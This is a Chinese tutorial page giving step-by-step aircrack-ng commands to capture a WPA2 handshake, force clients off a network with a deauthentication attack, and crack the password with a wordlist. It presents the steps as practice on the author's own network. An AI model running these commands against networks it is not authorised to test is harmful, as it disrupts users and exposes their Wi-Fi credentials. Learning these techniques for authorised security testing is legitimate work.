网站首页 > 资源文章 正文
ifconfig wlan0 up
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
开启无线网卡的监控模式
airmon-ng start wlan0
搜索wifi
airodump-ng wlan0mon
抓设备连接WiFi时的握手包
airodump-ng -c 11 --bssid B8:F8:83:32:17:60 -w ~/ wlan0mon
参数解释:
-c 表示信道,目标路由器在哪个信道上就写哪个信道。
--bssid 表示目标路由器的MAC地址
-w 表示握手包存放的路径
注:handshake握手包只有设备与路由器的wifi相连时才会产生,就是说如果没有设备相连那么就抓不到,那么就一直等待?一直等待是我们的风格,不能够啊!
有一条断网命令,利用向连接wifi的设备发送反证包的原理,让设备断开wifi,断开之后该设备会自动再次连接WiFi,这时候就可以抓到handshake包。(因为是我自己的网,我能抓到,就不弄贴图了)
aireplay-ng -0 10 -a B8:F8:83:32:17:60 -c 1C:91:48:A9:48:FD wlan0mon
参数:
-0表示deauthentication攻击
10表示一次发送10个反证包
-a表示目的路由器的MAC地址
-c表示目标设备的MAC地址
如果发了反证包还是抓不到,那就一次多发几个包,多发几次。抓到效果如下:
抓到握手包之后可以Ctrl+C停止抓包,并关闭无线网卡的监控模式
命令:
airmon-ng stop wlan0mon
monitor disable表示监控模式已关闭
我们抓到的握手包就在这里:
利用抓到的握手包进行破解密码
aircrack-ng -a2 -b B8:F8:83:32:17:60 -w /usr/share/wordlists/rockyou.txt ~/*.cap
参数:
-a2表示WPA2的握手包
-b表示目标路由器MAC
-w表示字典所在路径
最后一个参数是抓到的handshake包
用字典跑包,也就是所说的暴力破解,下面是成功的。
但跑包也算是个运气活,运气得好,字典得强。上面用的字典是kali目录下自带的字典,有时候也会出现下面的情况,也就是跑包失败了。
- 上一篇: 密码安全系列文章13:我无所不能——无线网络里面的秘密
- 下一篇: “握手陷阱”的破解擒拿术
猜你喜欢
- 2024-12-01 HTTPS加密协议详解:TLS/SSL握手过程
- 2024-12-01 你的WIFI真的安全吗?浅谈近年WIFI攻防史(全网首发)
- 2024-12-01 手机如何检测是否被安装木马程序?如何防止路由器被黑客重置?
- 2024-12-01 WebSocket能干些啥?
- 2024-12-01 你的wifi突然断了?小心那是黑客无线干扰技术!
- 2024-12-01 一文带你了解WiFi的工作原理,你家的WiFi密码被人破解了吗?
- 2024-12-01 从入门到精通:WiFi渗透哪家强?(2)
- 2024-12-01 揭秘最为知名的黑客工具之一:Wifite(无线网络自动化攻击利器)
- 2024-12-01 木马是怎么监控你手机的
- 2024-12-01 WiFi安全验证,与其破解方式扫盲
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- 电脑显示器花屏 (79)
- 403 forbidden (65)
- linux怎么查看系统版本 (54)
- 补码运算 (63)
- 缓存服务器 (61)
- 定时重启 (59)
- plsql developer (73)
- 对话框打开时命令无法执行 (61)
- excel数据透视表 (72)
- oracle认证 (56)
- 网页不能复制 (84)
- photoshop外挂滤镜 (58)
- 网页无法复制粘贴 (55)
- vmware workstation 7 1 3 (78)
- jdk 64位下载 (65)
- phpstudy 2013 (66)
- 卡通形象生成 (55)
- psd模板免费下载 (67)
- shift (58)
- localhost打不开 (58)
- 检测代理服务器设置 (55)
- frequency (66)
- indesign教程 (55)
- 运行命令大全 (61)
- ping exe (64)
本文暂时没有评论,来添加一个吧(●'◡'●)